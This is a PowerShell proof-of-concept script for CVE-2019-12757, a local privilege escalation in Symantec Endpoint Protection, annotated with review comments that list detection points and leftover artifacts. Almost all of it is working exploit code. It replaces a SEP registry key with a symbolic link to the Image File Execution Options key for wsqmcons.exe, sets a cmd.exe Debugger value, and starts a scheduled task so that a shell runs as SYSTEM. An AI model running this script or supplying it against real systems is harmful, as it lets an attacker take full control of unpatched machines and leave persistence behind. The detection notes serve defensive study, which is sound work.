@enigma0x3
Created November 14, 2019 17:53
CVE-2019-12757
# Proof-of-concept script published under the title CVE-2019-12757. It operates
# on Symantec Endpoint Protection (SEP) registry keys under HKLM and, per its
# own final message, is meant to end with cmd.exe running as NT AUTHORITY\SYSTEM.
#
# Observable sequence (useful when building detections or triaging a host):
#   1. Installs and imports the NTObjectManager module for the current user.
#   2. Reads the SymProtect RealTimeScan "Disabled" value; continues only if "1".
#   3. Deletes ...\AV\Scheduler\<current user SID> and recreates that path as a
#      registry symbolic link to the IFEO key for wsqmcons.exe.
#   4. Creates C:\exploit, starts DoScan.exe against it, waits 10 seconds.
#   5. Writes a "Debugger" value under the IFEO key and starts the
#      "Consolidator" scheduled task.
#
# NOTE(review): nothing below removes the symbolic link, the IFEO Debugger
# value or C:\exploit, so all three remain on the host as artifacts.
# NOTE(review): the script assumes the calling user can delete and recreate the
# Scheduler\<SID> key under HKLM; the reason is not shown here. Confirm against
# the vendor advisory for CVE-2019-12757 and apply the vendor's fix.

# Module install from the gallery into the per-user scope; -Force suppresses prompts.
Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green"
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
# Gate: the rest runs only when this value equals "1", which the script's own
# messages treat as Tamper Protection being off.
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green"
$Result = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled
if($Result.Disabled -eq "1")
{
# The SID of the current identity names the per-user Scheduler subkey used below.
$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$SID = $User.Value
Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green"
# Detection point: deletion of a SEP Scheduler\<SID> key by a non-SEP process.
Write-Host "[*] Removing registry key..." -ForeGroundColor "Green"
Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force
# Detection point: the same path is recreated as a registry symbolic link whose
# target is the Image File Execution Options (IFEO) key for wsqmcons.exe.
Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe")
Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green"
# A scan of a freshly created directory is requested through SEP's DoScan.exe.
# NOTE(review): presumably a privileged SEP component then touches the
# Scheduler\<SID> path and follows the link; not visible in this script.
New-Item -Path "c:\" -Name "exploit" -ItemType "directory"
Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit"
# Fixed delay instead of polling; the write below depends on the scan step
# having taken effect within this window.
Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green"
Start-Sleep "10"
# Detection point: a "Debugger" value written under an IFEO subkey is a
# well-known indicator (MITRE ATT&CK T1546.012); alert on it regardless of
# which image name the subkey carries.
Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green"
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
# Detection point: on-demand start of the "Consolidator" task from a user session.
# NOTE(review): presumably this task launches wsqmcons.exe, so the Debugger
# value above applies to it; confirm against the task definition.
Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green"
Get-ScheduledTask "Consolidator" | Start-ScheduledTask
Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green"
} else{
# Any value other than "1" is treated as Tamper Protection enabled; nothing is modified.
Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red"
}